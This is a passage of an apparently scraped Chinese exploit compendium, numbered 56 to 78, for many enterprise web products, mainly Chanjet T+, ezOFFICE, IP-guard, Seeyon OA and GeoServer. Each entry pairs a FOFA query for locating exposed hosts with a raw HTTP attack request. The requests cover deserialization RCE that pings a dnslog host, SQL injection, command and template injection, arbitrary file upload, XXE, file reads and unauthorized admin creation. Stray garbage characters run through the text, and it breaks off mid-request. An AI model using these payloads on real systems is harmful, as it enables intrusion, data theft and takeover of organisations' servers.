! ?$ k: V/ [# t' M" n3 q1 d, r% {/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie) o$ X% U2 s1 J1 E' T
第二步,利用获取到的Cookie请求  b! H& H3 q7 ?- \4 l& s! h
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers# W+ B$ Q! g; p$ M/ h9 V+ P- w$ d

4 ], o+ ?* I2 r- E; I9 o3 r: U4 {56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE. U* p% {% H. ~* p: b
FOFA: app="畅捷通-TPlus"
/ }0 G8 A  |; wPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1- R6 n6 v5 [- G9 k6 ?
Host: x.x.x.x9 X* H+ k) i% u8 i1 G1 G. M4 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36/ k9 _/ ^* i1 S8 z( [# D
Content-Type: application/json
! ~. U( ?) `  W1 \' B5 U3 Z0 d% z
{
5 Z$ x% Z; Z8 \  R! Z  "storeID":{
" Z6 n5 k: G7 N! B2 n2 v    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  Q8 @# ^- B0 O   "MethodName":"Start",
5 g- u# g. U# ?" t0 l5 `    "ObjectInstance":{
+ O. l! q6 [# k) z7 u       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 d- d1 |& C1 V        "StartInfo": {
3 ]' `+ h% ^7 i* w  }           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ I9 H5 H, b7 {( @( O, N6 }6 M
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
4 l  ^9 z3 O" }! s! x       }
" G0 j8 J; G  j& k7 h% E: C    }
3 S  y; c; f9 G) m  }
5 o% R* a6 \) A7 I}/ P" c/ ?7 k; F3 X" F* z4 {" j
% N8 T% [. b1 h" b4 J9 O: a

$ n; b* C0 z+ H* v- [. C57. 畅捷通T+ keyEdit.aspx SQL注入
# E9 }+ ]: ^- Y: S" VFOFA:app="畅捷通-TPlus"
2 O1 z3 V: @  m7 _9 T) X& UGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
, J9 \$ z. y( K+ I/ QHost: host8 r; T: \8 n3 w7 v- k* `; p' s
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36" M  P& I/ y3 k- W
Accept-Charset: utf-8
7 X  H% R* ~! ~0 Q( e; YAccept-Encoding: gzip, deflate, A6 u0 U! l3 ]! f7 M; \. e
Connection: close* W/ K! r8 W# |/ B# n

% V9 q5 ~, B( m+ `; n8 \) v# A, W/ K+ P- Q8 l1 v; m. H- F
58. 畅捷通T+ KeyInfoList.aspx sql注入" j1 ^" I1 g- o' Q
FOFA:app="畅捷通-TPlus"- I8 M8 y7 {. {4 [' \
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1/ z( U" J( I& f( Q
Host: your-ip; L+ h/ w4 ?0 `5 z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 w) J: \+ x5 M5 F% m) B. u/ u6 ]
Accept-Charset: utf-8
# J+ n. E/ g- m3 }% u8 @Accept-Encoding: gzip, deflate
! {& [1 ]/ e/ kConnection: close
$ O6 [7 A4 X$ c5 e8 z3 l3 w9 ^- J) a* [2 U7 r2 h
8 p# ~4 @0 F' p" w# A6 O! H
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行2 z7 L  e# A2 E2 e- g7 r1 I
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
) i& V+ O0 s  }: U& WPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
4 y& Z5 s  A6 QHost: 192.168.86.128:9090
) g! {( u8 x' ~$ a2 b1 O5 hUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36! _: O; C" m8 |$ ]9 j  v
Connection: close3 H7 Q1 V9 E( J3 _: h
Content-Length: 1669  W5 N, ]- Y" G& j* C5 F, G
Accept: */*
; B+ d5 |' K$ ZAccept-Language: en
* S8 e8 K5 }  [/ VContent-Type: application/x-www-form-urlencoded
# v2 U2 |. D$ FAccept-Encoding: gzip
8 A5 D/ ^' X1 S1 y. E8 |+ T4 g6 C: u7 C
PAYLOAD/ o, k* h5 m0 [2 u/ ?3 r

- P* A; }. e6 U1 w* T
5 `& e5 l+ {$ Q% Q60. 百卓Smart管理平台 importexport.php SQL注入+ c( |  O6 ?4 s1 R7 A" ?- j
FOFA:title="Smart管理平台"& s+ ~% ^0 _  e
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
% @" C' |2 ]  L) BHost:1 X: F& ^7 Y: B3 L: L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, m& p3 T, M- U9 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 @; X* m* `  N6 b) l# ^
Accept-Encoding: gzip, deflate2 e# a* g) z- v6 L
Accept-Language: zh-CN,zh;q=0.9
# _8 l# {, D+ R( Z0 \Connection: close, g6 N" }; t. N, a4 X6 K
8 m0 @% g) i2 e' h. a

* k8 I" R5 p* d* d+ f0 m3 A61. 浙大恩特客户资源管理系统 fileupload 任意文件上传) P  F1 o/ R" R5 V4 T
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
* ?' v: r0 G$ g. f3 A( u/ KPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.15 Z9 S- Z# ?6 t- _( d
Host: x.x.x.x
+ P& A/ }; I' _3 b  G) \) }9 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' {+ u# Y4 z1 I% CConnection: close
0 ^9 g+ @2 @, W" u7 b# AContent-Length: 27
+ f/ N7 I6 [- Y" d4 E' EAccept: */*% K) B8 _, N$ z( [/ i* d' X0 W
Accept-Encoding: gzip, deflate
% [, o: S8 E2 eAccept-Language: en
5 D2 L1 L: C. v# WContent-Type: application/x-www-form-urlencoded
9 Y$ a+ u  k8 U& X3 {( j0 E  Z% V) T* W6 Z
8uxssX66eqrqtKObcVa0kid98xa. L- i: I5 _* l3 E0 |

; ~  K5 F2 S) C# \4 N" R: H# q) F
! \3 l) Q5 M  }; J0 k) O62. IP-guard WebServer 远程命令执行7 h% D; \7 Q  a  C: u
FOFA:"IP-guard" && icon_hash="2030860561"
* G6 C' q% Y" ~" q' E4 iGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
  h% ]; B( g- c; |$ W* J! U2 OHost: x.x.x.x
$ a# {% p6 {  h0 RUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
& w1 t( Z+ s4 _. _; e5 n9 QConnection: close2 l4 o" w0 b! F3 k
Accept: */** W3 p' B6 Y4 [5 m/ v+ L$ \
Accept-Language: en! A: A9 [' B. {3 _# \
Accept-Encoding: gzip/ x8 f# l9 f! P( Q0 `! o! \4 Z' |
# u" W8 W" G4 K% _

5 G: Z5 m9 ~+ y( p) W, \访问* o% C: i7 D0 d% K; S9 A& _/ v1 @

9 e" {, i- W- ?9 l: |8 s% _GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: T( O+ b, V, Z/ S( g  m' H' GHost: x.x.x.x
* V# ]  }0 T9 k& c5 n' a- H8 Z, v; g$ N" ]
& o& [2 l0 p$ Q: e
63. IP-guard WebServer任意文件读取
* Z& s+ P* X# b: r8 e- L& MIP-guard < 4.82.0609.0; k, |) P+ c$ a- u5 q
FOFA:icon_hash="2030860561"
$ M% U: L% ^0 d, _3 y  QPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
% A9 z  y( }& p( s8 [% ZHost: your-ip0 q$ U& J* T7 C' O1 ~% f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" }- E1 w8 K3 z* i# nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 K( X. G) E9 W3 q- |Accept-Encoding: gzip, deflate6 v7 h  }5 j! N) M$ c* E
Accept-Language: zh-CN,zh;q=0.9
$ h2 j8 N/ J. G  K. yConnection: close
/ o3 P# g- h% HContent-Type: application/x-www-form-urlencoded0 p- S; ^+ j0 m% k
/ t( Y6 s2 H& S2 W! K" d2 W; S
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A) T* f( l2 J7 c9 e* r3 g7 q6 O6 ^
# U0 h# C$ u9 o8 b0 y0 [
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
+ ~6 X8 v' ^) ^! \! \  kFOFA:body="/Scripts/EnjoyMsg.js"! J' A) j* ]. }' h# E9 E
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
5 `/ r! M- m" P% z0 |3 ZHost: 192.168.86.128:9001
  e& e0 ~* k; a% x# H4 o$ jUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.367 z0 j) U/ A5 A
Connection: close
0 Y, @$ P  T4 ^8 e2 C- A0 EContent-Length: 3690 e  U$ R5 o6 W$ I
Accept: */*- w; P1 A4 W  H/ y2 @7 }
Accept-Language: en6 l  c# b' g+ o3 F
Content-Type: text/xml; charset=utf-84 ^( {4 r: M: H$ P* m# G
Accept-Encoding: gzip% n% K0 s1 A  e" t: g- k# W
% r+ g4 |+ u+ {+ N
<?xml version="1.0" encoding="utf-8"?>
; B( Z5 l% K7 @( @$ t<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
, y7 h: f7 z0 h* L8 W" k& ]6 z% h+ }<soap:Body>
+ d" w0 {) F0 u+ n$ K    <GetOSpById xmlns="http://tempuri.org/"># i" M+ h6 k3 p5 g" L
      <sId>1';waitfor delay '0:0:5'--+</sId>
' I. z" b7 n3 x( K5 B' Q7 _7 U    </GetOSpById>
. U" `: S- M' S$ r3 s) [  </soap:Body>9 L5 b2 }9 e. @0 k- o
</soap:Envelope>6 e3 s$ C0 ?" C- S- J: u7 b
# J3 Q5 N/ \% E0 P' w
/ Z9 C0 q: p+ X+ c
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过9 H4 y4 k" X$ @" p! \  m
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
2 L) M! L3 a4 ?响应200即成功创建账号test123456/123456
+ v. ?6 ]- r2 X, {POST /SystemMng.ashx HTTP/1.11 H1 d; w3 i. t
Host:
% z& f( \# @7 n# gUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1). S% |) f' C( U0 H1 v1 c3 j! R6 A
Accept-Encoding: gzip, deflate2 Q5 j0 u: [# X, O6 ~
Accept: */*
5 ^9 J5 n' `" O2 g: h: zConnection: close+ ~" Q% R+ Z' ~; V+ v
Accept-Language: en
5 q. w0 ^0 c+ v% V7 zContent-Length: 174
( V9 G: \3 @; m; p
3 P& s: U9 l% T' PoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators: o, u* f9 i$ y9 ~2 g' D7 A3 D* O

$ K. u2 [# M& U# C
2 |/ m! x/ L; l$ z66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入. j) _9 s# O& }& {
FOFA:app="万户ezOFFICE协同管理平台"
$ J5 I  \/ ]' D. s" _/ Q& P! F1 M
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
& U% h! u/ s8 F1 xHost: x.x.x.x: j* w1 q- {; ?7 g( Q+ A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
1 p, u5 K" ~) u/ oConnection: close3 x( t1 {+ D" E$ h: x
Accept: */*
2 U3 ~7 X% K; N. {Accept-Language: en8 _2 d' `+ I5 V* R* V" K9 J
Accept-Encoding: gzip5 f/ A+ g3 `2 n

4 D5 d, [2 u7 G  E# I3 l1 @" u. f& D0 r$ E+ A
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
0 k9 g. g" b: G
" K: {3 U- l& n- h2 f# Z$ y" P67. 万户ezOFFICE wpsservlet任意文件上传
, Z% O2 {/ g% d9 sFOFA:app="万户网络-ezOFFICE"0 F. m- o" d. K8 a, C2 f
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型- `% O! z# r( e( ^* R
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.16 L: D+ p% y* C4 {: d; s" @
Host: x.x.x.x2 J. c# E  {. B1 e8 b+ H$ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
9 V3 {+ B  C5 x! X# ^" F- ?Content-Length: 173/ K, j$ V; @) ~( \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8# [5 l: }& O9 [) p
Accept-Encoding: gzip, deflate
, q) j/ V+ `7 r2 I8 U: N: ?Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
' L# c/ m, [7 p: p1 ~: fConnection: close
2 j2 r- J. g: wContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp; u1 \' V6 I& I$ d
DNT: 1, S0 u4 {' k2 W7 F/ }
Upgrade-Insecure-Requests: 1
5 I+ F3 U4 Q3 u! x2 }8 m/ a
* }% H; h: ~. G5 g$ n--ufuadpxathqvxfqnuyuqaozvseiueerp
. B) ^0 X$ O: \$ W1 GContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
2 k. s& p" p2 q, }7 Q' R4 H) A# c' g
<% out.print("sasdfghjkj");%>
/ {/ [/ j% ]3 d9 M* q--ufuadpxathqvxfqnuyuqaozvseiueerp--
; D/ z/ j: B& N1 z. ~- w6 c
! M+ U7 e7 Z3 Z# \. C# W% s; B3 q; ~$ {$ _; u+ k8 x1 X3 ^, B* E
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp7 T3 v0 i5 x+ V7 S5 ?* j7 g
$ x: j( W  p2 m7 s: M, ^0 O
68. 万户ezOFFICE wf_printnum.jsp SQL注入
# s7 |" X/ l( e0 A! S! G& i+ iFOFA:app="万户ezOFFICE协同管理平台"
; h- O4 G! f# D( Y; w5 S9 dGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
# z4 h2 b# }9 t/ P3 e# y: O; I  kHost: {{host}}
% u; G! r. Q$ ]0 ]$ \% ]- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
" g' _; ~  z4 v1 [Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
. @7 m- {# ]. Z; i1 w6 z2 r7 zAccept-Encoding: gzip, deflate
2 m* a) S5 z% y7 L$ tAccept-Language: zh-CN,zh;q=0.9+ T7 x3 Z, K: j! R( W! V3 \1 d/ V1 E
Connection: close
. m" G" w% }8 @3 P1 S8 _* B. b' F6 W

+ v2 @' b8 ^& o69. 万户 ezOFFICE contract_gd.jsp SQL注入5 k  E) Q& `# V( S/ e
FOFA:app="万户ezOFFICE协同管理平台"
1 f! P* f& F2 _GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
$ e! e/ f/ k  A2 MHost: your-ip- B1 s% X* p1 d4 z( m, }, M2 d
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 S7 E* s/ [4 F( r+ PAccept-Encoding: gzip, deflate
7 J: @  Q( a" t' C6 i4 XAccept: */*
2 t9 A" k, F* r1 [1 OConnection: keep-alive
* `! T; S6 }( u' j/ T$ s: q9 k: J, `" n

7 g2 Q- `: t! o. r/ g( j' n7 v70. 万户ezEIP success 命令执行4 U4 G* H6 }% e% @) m
FOFA:app="万户网络-ezEIP"
8 c# ^# w7 J( X1 U3 xPOST /member/success.aspx HTTP/1.1
6 c0 p8 Y/ S( D/ J4 dHost: {{Hostname}}
" ^6 u+ a% P# r- O/ D' v6 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.361 R* G0 s4 [6 B. h! v2 L& j
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
; T) J1 t1 D+ x. n6 E% d) {- a: b( WContent-Type: application/x-www-form-urlencoded+ B& T3 s4 d7 o9 \# ~( u8 I
TYPE: C8 X9 I" u5 L0 V4 q
Content-Length: 16702) s# k- x3 Z( ^5 L9 P, P

2 r& d1 k8 z  `, d9 X8 p__VIEWSTATE=PAYLOAD
+ ], w$ `* u5 H! }2 D. G
- B7 Z8 D8 H2 g$ `9 {2 t2 t% o
0 @: w; h6 |8 u1 Z2 {( l: |( O5 y( w71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入# u' T! p) }' z7 r% [& {4 Q9 L$ |
FOFA:body="PM2项目管理系统BS版增强工具.zip"
( _$ j6 O2 X0 l9 H, F6 D" LGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1% z$ |+ F+ N! C+ X9 t9 c
Host: x.x.x.xx.x.x.x4 N9 \1 n3 ^1 R: a- b' J" T7 I
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 J0 W9 v! ]: Q* f* ^* UConnection: close
/ a+ d3 e0 X+ y; D+ ?( @9 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 b( H% |4 G- N' UAccept-Encoding: gzip, deflate
2 c& G3 }- G, G3 K  I( lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 j( j3 e# o, q; W; s: n; Y& _
Upgrade-Insecure-Requests: 1" X' y! `6 h, x; ~+ U- o
1 P4 p0 u# p9 i6 ]$ @

' i1 F0 e$ z) E; R: ~; D72. 致远OA getAjaxDataServlet XXE
5 v  S1 {& ~8 r: iFOFA:app="致远互联-OA"& k' r8 R) a, k# a. ~
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
* _! c" T9 w0 a, G  y4 ~Host: 192.168.40.131:8099
" |; g; O- }+ O3 p% i. dUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
, J* R! Y( U, l) c* B' z0 r& DConnection: close
8 F% o) k4 A* T; DContent-Length: 583
! s* i, g! {/ I1 @$ {, fContent-Type: application/x-www-form-urlencoded
0 U  A/ g% K: R& \; P: pAccept-Encoding: gzip
; j! T1 y2 A3 l. [! h, h( Z" Q7 D; w6 u2 ~
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
  U5 e2 W/ d: ?$ T- q$ h; {+ H0 l( _) r
" C. k$ p/ n0 G6 s: O# O
73. GeoServer wms远程代码执行
  V- x) y# y- Y3 w* l. FFOFA:icon_hash=”97540678”
& ~9 s; D: f  y& i! APOST /geoserver/wms HTTP/1.16 W' ^0 q" L) [; C- b
Host:& N# _0 Q% P/ n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' ~8 E4 m) s" x! j5 j. S, Q: `7 i
Content-Length: 1981" P5 j0 h* f# d0 |; Z
Accept-Encoding: gzip, deflate9 I6 H  F) w! h1 }
Connection: close
/ R6 F( |8 S: gContent-Type: application/xml
. K" @# C7 f& o" _SL-CE-SUID: 3
7 \7 e9 q# L1 ?+ _* {
/ ^" J4 x$ t: a8 {' S7 i$ EPAYLOAD
: t5 q  v/ h/ E. s5 P$ m; u- T) i  y: S: K+ t6 b3 g

* f; I# Q7 _+ K& m74. 致远M3-server 6_1sp1 反序列化RCE
( y( e; d9 H9 W+ \/ q- x, {FOFA:title="M3-Server"/ C  h2 ]& ~- _6 V4 _
PAYLOAD
, ~/ X% n7 u7 u: l, Q3 B% f( ]6 n" M( [
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE  N# r( D$ ^8 G/ w2 o" @# Q+ C
FOFA:app="TELESQUARE-TLR-2005KSH". {# q2 N2 ~7 C0 |( W
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.10 ]1 |) B! p+ e8 @! ~! b. \6 O7 a
Host: x.x.x.x
$ Y, c" R3 e6 `& g/ L4 h; ]5 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- |5 m0 |; X: j) I1 eConnection: close
1 k( @5 z; O( A+ B) JAccept: */*+ y/ W( O( J9 E6 v
Accept-Language: en
$ I; k+ c, `" L- d& cAccept-Encoding: gzip
7 \7 h8 _+ ^+ I0 A, ?4 l; Z! o8 ]: e( v

$ k1 I! ]& d) sGET /cgi-bin/test28256.txt HTTP/1.1: P. N- a0 d9 b/ o4 I
Host: x.x.x.x
9 o9 B- Y  Y/ r3 R; l/ I2 l' V, |9 C' q$ x$ b* i

: |% n- [: ~5 E( K% p( G76. 新开普掌上校园服务管理平台service.action远程命令执行
7 x3 h6 [3 `* X6 B) [  m( P' KFOFA:title="掌上校园服务管理平台"0 [3 q7 f* H9 X- f7 O
POST /service_transport/service.action HTTP/1.1* r" G8 q1 k# V
Host: x.x.x.x" V: L( }* c$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 G* Z# ~1 J" c9 b. L! S% r
Connection: close
  E1 \1 Q; f/ [. y2 U2 ]) aContent-Length: 211$ ~. ~0 ~9 Y3 P5 k6 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ d6 t- o2 S+ L1 D+ [9 l8 A
Accept-Encoding: gzip, deflate
3 r% a0 T  c& R* F8 D8 L' ^/ hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 I7 i- E- ?# ^2 y
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
7 U- }& O; [0 d9 ?Upgrade-Insecure-Requests: 1
/ _1 c7 s, }# W+ p3 n* b# m4 a) p" o7 u) ^& M8 {
{' u9 X5 t7 z! d' ?: p
"command": "GetFZinfo",
$ Y2 a9 Y. s9 C3 d9 C  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\": r1 v% R6 L1 Q' G/ V2 R1 q
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"5 B2 @& g, ^% P3 I& O
}, V$ k! `+ G" t, _+ I. g. q+ z+ E
. P' J/ {/ ?7 B' C- r

: f/ }0 }( V7 C$ [6 O4 ~4 EGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.18 F3 b+ t& M/ Q# v( E6 t" G0 r
Host: x.x.x.x
$ e3 v8 g. W% D
2 U4 C) Y, Z; C* p/ I1 X2 S
& i3 e; ]6 g, v) r+ G; ~) l/ I- M8 J4 [* U& M" {. Y
77. F22服装管理软件系统UploadHandler.ashx任意文件上传. B! t; }' g  t8 g7 O0 v2 c, K
FOFA:body="F22WEB登陆"4 ~5 J; H* E; H$ E; F) f
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
3 e, x4 E! {( t/ J* p; HHost: x.x.x.x
# ?$ o4 Z1 N& F  {5 u  E) x6 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ O5 Q. X0 [* r1 K$ {, U. nConnection: close
5 a* m$ ~5 n' I; o) Q! K8 d' {$ g( KContent-Length: 433
/ {& O: @* L+ j7 XAccept: */*; }) ]4 m% W8 G& e3 ^( t
Accept-Encoding: gzip, deflate- b. ?9 G  D  }; _
Accept-Language: zh-CN,zh;q=0.9* b& m2 L2 Z; S  C, F
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
3 w/ \& B0 f+ r$ f' g( {
) b. I/ J8 Q3 w/ {------------398jnjVTTlDVXHlE7yYnfwBoix# O, R, Q: q) o  j( c% a
Content-Disposition: form-data; name="folder"" M$ B  [% M* R5 D7 o; J
! r7 @$ Y" Z7 \; X: y/ _# Y: g
/upload/udplog% m0 R( Q. z4 j& E" ~! c
------------398jnjVTTlDVXHlE7yYnfwBoix
8 V; ?1 _) k8 u0 Q7 ^5 I! A& i* SContent-Disposition: form-data; name="Filedata"; filename="1.aspx"9 I% @9 l9 Q; K8 n1 j. d- @
Content-Type: application/octet-stream
9 @! o7 b- x1 n6 F
9 W6 O: f6 k& x* L+ Z1 thello12345675 `3 O" j+ a, e2 r% g3 `* c& t
------------398jnjVTTlDVXHlE7yYnfwBoix6 X+ y! m  Y+ ~+ P7 ]) R6 y- y
Content-Disposition: form-data; name="Upload"+ v2 e8 l& O) w; x' n
% G, @4 [) i; D" {( ?: v; ^
Submit Query8 I% Y0 \7 J& w, s9 V
------------398jnjVTTlDVXHlE7yYnfwBoix--* \- p( \! W7 m0 N% ?* K
/ |  |( S; F3 j. s$ S( C( \

+ [8 P2 a, u1 y$ [78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传; W4 E; D# h0 J: k1 n
FOFA:icon_hash="2001627082"
( R* q0 ]# w9 T' W7 {% Z0 APOST /Platform/System/FileUpload.ashx HTTP/1.10 A4 H# ?" e# }- R' s
Host: x.x.x.x( h+ {( |8 {4 T+ o( H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! Q) t; Z4 W' Q6 ]
Connection: close
+ z8 x" c6 i- ~8 z2 sContent-Length: 336
